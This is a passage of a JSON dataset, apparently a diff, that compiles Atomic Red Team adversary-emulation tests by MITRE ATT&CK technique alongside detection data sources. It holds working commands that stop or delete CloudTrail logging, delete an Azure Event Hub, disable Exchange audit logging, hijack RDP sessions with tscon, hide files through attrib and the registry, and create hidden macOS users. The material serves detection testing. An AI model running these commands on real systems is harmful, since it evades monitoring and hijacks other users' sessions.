--bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json\n", + "get_prereq_command": "echo Please install the aws-cli and configure your AWS defult profile using: aws configure\n" + } + ], + "executor": { + "command": "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name 
#{cloudtrail_name} --region #{region}\n", + "cleanup_command": "aws s3 rb s3://#{s3_bucket_name} --force \n", + "name": "sh", + "elevation_required": false + } + }, + { + "name": "Azure - Eventhub Deletion", + "auto_generated_guid": "5e09bed0-7d33-453b-9bf3-caea32bff719", + "description": "Identifies an Event Hub deletion in Azure.\nAn Event Hub is an event processing service that ingests and processes large volumes of events and data.\nAn adversary may delete an Event Hub in an attempt to evade detection.\nhttps://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure username", + "type": "String", + "default": null + }, + "password": { + "description": "Azure password", + "type": "String", + "default": null + }, + "event_hub_name": { + "description": "Name of the eventhub", + "type": "String", + "default": "test_eventhub" + }, + "resource_group": { + "description": "Name of the resource group", + "type": "String", + "default": null + }, + "name_space_name": { + "description": "Name of the NameSpace", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Install-Module -Name Az\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzureAD -Credential $creds\nNew-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}\nRemove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}\n", + "name": 
"powershell", + "elevation_required": false + } + }, + { + "name": "Office 365 - Exchange Audit Log Disabled", + "auto_generated_guid": "1ee572f3-056c-4632-a7fc-7e7c42b1543c", + "description": "You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.\nUnified or Admin Audit logs are disabled via the Exchange Powershell cmdline.\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml\n", + "supported_platforms": [ + "office-365" + ], + "input_arguments": { + "username": { + "description": "office-365 username", + "type": "String", + "default": null + }, + "password": { + "description": "office-365 password", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ExchangeOnlineManagement PowerShell module must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name ExchangeOnlineManagement \nImport-Module ExchangeOnlineManagement\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\nSet-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False\n", + "cleanup_command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\nSet-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + 
"possible_detections": [ + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service modification", + "description": "A cloud service was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service disable", + "description": "A cloud service was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1563.002", + "command_list": [ + "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon 1337 /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:rdp-tcp#55\"\nnet start sesshijack\n" + ], + "commands": [ + { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon 1337 /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "source": "atomics/T1563.002/T1563.002.yaml", + "name": "Atomic Red Team Test - Remote Service Session Hijacking: RDP Hijacking" + }, + { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:rdp-tcp#55\"\nnet start sesshijack\n", + "source": "atomics/T1563.002/T1563.002.yaml", + "name": "Atomic Red Team Test - Remote Service Session Hijacking: RDP Hijacking" + } + ], + 
"parsed_datasets": [ + { + "attack_technique": "T1563.002", + "display_name": "Remote Service Session Hijacking: RDP Hijacking", + "atomic_tests": [ + { + "name": "RDP hijacking", + "auto_generated_guid": "a37ac520-b911-458e-8aed-c5f1576d9f46", + "description": "[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Session_ID": { + "description": "The ID of the session to which you want to connect", + "type": "String", + "default": "1337" + }, + "Destination_ID": { + "description": "Connect the session of another user to a different session", + "type": "String", + "default": "rdp-tcp#55" + } + }, + "executor": { + "command": "query user\nsc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}\"\nnet start sesshijack\n", + "cleanup_command": "sc.exe delete sesshijack >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being 
created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1564.001", + "command_list": [ + "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "attrib.exe +s %temp%\\T1564.001.txt\n", + "attrib.exe +h %temp%\\T1564.001.txt\n", + "setfile -a V /tmp/evil\n", + "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "defaults write com.apple.finder AppleShowAllFiles YES\n", + "reg add 
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n" + ], + "commands": [ + { + "command": "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "attrib.exe +s %temp%\\T1564.001.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "attrib.exe +h %temp%\\T1564.001.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "setfile -a V /tmp/evil\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "defaults write com.apple.finder AppleShowAllFiles YES\n", + "source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + }, + { + "command": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n", + 
"source": "atomics/T1564.001/T1564.001.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Files and Directories" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.001", + "display_name": "Hide Artifacts: Hidden Files and Directories", + "atomic_tests": [ + { + "name": "Create a hidden file in a hidden directory", + "auto_generated_guid": "61a782e5-9a19-40b5-8ba4-69a4b9f3d7be", + "description": "Creates a hidden file inside a hidden directory\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "mkdir /var/tmp/.hidden-directory\necho \"T1564.001\" > /var/tmp/.hidden-directory/.hidden-file\n", + "cleanup_command": "rm -rf /var/tmp/.hidden-directory/\n", + "name": "sh" + } + }, + { + "name": "Mac Hidden file", + "auto_generated_guid": "cddb9098-3b47-4e01-9d3b-6f5f323288a9", + "description": "Hide a file on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "xattr -lr * / 2>&1 /dev/null | grep -C 2 \"00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00\"\n", + "name": "sh" + } + }, + { + "name": "Create Windows System File with Attrib", + "auto_generated_guid": "f70974c8-c094-4574-b542-2c545af95a32", + "description": "Creates a file and marks it as a system file using the attrib.exe utility. 
Upon execution, open the file in file explorer then open Properties > Details\nand observe that the Attributes are \"SA\" for System and Archive.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_modify": { + "description": "File to modify using Attrib command", + "type": "String", + "default": "%temp%\\T1564.001.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_to_modify})\n", + "prereq_command": "IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo system_Attrib_T1564.001 >> #{file_to_modify}\n" + } + ], + "executor": { + "command": "attrib.exe +s #{file_to_modify}\n", + "cleanup_command": "del /A:S #{file_to_modify} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Windows Hidden File with Attrib", + "auto_generated_guid": "dadb792e-4358-4d8d-9207-b771faa0daa5", + "description": "Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. 
Then, open Properties > Details on the file\nand observe that the Attributes are \"SH\" for System and Hidden.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_modify": { + "description": "File to modify using Attrib command", + "type": "String", + "default": "%temp%\\T1564.001.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_to_modify})\n", + "prereq_command": "IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo system_Attrib_T1564.001 >> #{file_to_modify}\n" + } + ], + "executor": { + "command": "attrib.exe +h #{file_to_modify}\n", + "cleanup_command": "del /A:H #{file_to_modify} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Hidden files", + "auto_generated_guid": "3b7015f2-3144-4205-b799-b05580621379", + "description": "Requires Apple Dev Tools\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "filename": { + "description": "path of file to hide", + "type": "Path", + "default": "/tmp/evil" + } + }, + "executor": { + "command": "setfile -a V #(unknown)\n", + "name": "sh" + } + }, + { + "name": "Hide a Directory", + "auto_generated_guid": "b115ecaf-3b24-4ed2-aefe-2fcb9db913d3", + "description": "Hide a directory on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "touch /var/tmp/T1564.001_mac.txt\nchflags hidden /var/tmp/T1564.001_mac.txt\n", + "cleanup_command": "rm /var/tmp/T1564.001_mac.txt\n", + "name": "sh" + } + }, + { + "name": "Show all hidden files", + "auto_generated_guid": "9a1ec7da-b892-449f-ad68-67066d04380c", + "description": "Show all hidden files on MacOS\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "defaults write com.apple.finder AppleShowAllFiles YES\n", + "cleanup_command": "defaults write com.apple.finder AppleShowAllFiles NO\n", + 
"name": "sh" + } + }, + { + "name": "Hide Files Through Registry", + "auto_generated_guid": "f650456b-bd49-4bc1-ae9d-271b5b9581e7", + "description": "Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.\nSee how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v Hidden /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v ShowSuperHidden /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v Hidden /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1564.002", + "command_list": [ + "sudo dscl . -create /Users/APT UniqueID 333\n", + "sudo dscl . -create /Users/APT IsHidden 1\n" + ], + "commands": [ + { + "command": "sudo dscl . 
-create /Users/APT UniqueID 333\n", + "source": "atomics/T1564.002/T1564.002.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Users" + }, + { + "command": "sudo dscl . -create /Users/APT IsHidden 1\n", + "source": "atomics/T1564.002/T1564.002.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Users" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.002", + "display_name": "Hide Artifacts: Hidden Users", + "atomic_tests": [ + { + "name": "Create Hidden User using UniqueID < 500", + "auto_generated_guid": "4238a7f0-a980-4fff-98a2-dfc0a363d507", + "description": "Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "user_name": { + "description": "username to add", + "type": "String", + "default": "APT" + } + }, + "executor": { + "command": "sudo dscl . -create /Users/#{user_name} UniqueID 333\n", + "cleanup_command": "sudo dscl . -delete /Users/#{user_name}\n", + "elevation_required": true, + "name": "sh" + } + }, + { + "name": "Create Hidden User using IsHidden option", + "auto_generated_guid": "de87ed7b-52c3-43fd-9554-730f695e7f31", + "description": "Add a hidden user on macOS using IsHidden optoin\n", + 